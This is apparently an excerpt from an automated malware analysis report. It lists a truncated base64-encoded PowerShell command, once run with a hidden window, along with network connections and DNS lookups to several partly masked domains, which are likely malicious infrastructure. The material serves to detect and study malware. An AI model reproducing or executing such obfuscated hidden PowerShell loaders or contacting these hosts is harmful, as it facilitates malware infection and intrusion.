Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABDAG4AbQBoAHAAbQBpAG8APQAnAEoAeQB6AGYAYQBjAGEAdwAnADsAJABRAGcAdQBmAGQAZwBmAGoAdQBvACAAPQAgACcANQAxADQAJwA7ACQASwBwAHIAeQB2AHIAdwB0AHEAPQAnAEkAcQB6AGoAaABzAGMAYQBoAGkAbQBvAHgAJwA7ACQATAB...
- 'tm###ocdung.com':443
- DNS ASK bi#####ammarketi.com
- DNS ASK ra#####lchandani.com
- DNS ASK bl##.##oonclearing.com
- DNS ASK tm###ocdung.com
- DNS ASK ag####afarms.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABDAG4AbQBoAHAAbQBpAG8APQAnAEoAeQB6AGYAYQBjAGEAdwAnADsAJABRAGcAdQBmAGQAZwBmAGoAdQBvACAAPQAgACcANQAxADQAJwA7ACQASwBwAHIAeQB2AHIAdwB0AHEAPQAnAEkAcQB6AGoAaABzAGMAYQBoAGkAbQBvAHgAJwA7ACQATAB...' (with hidden window)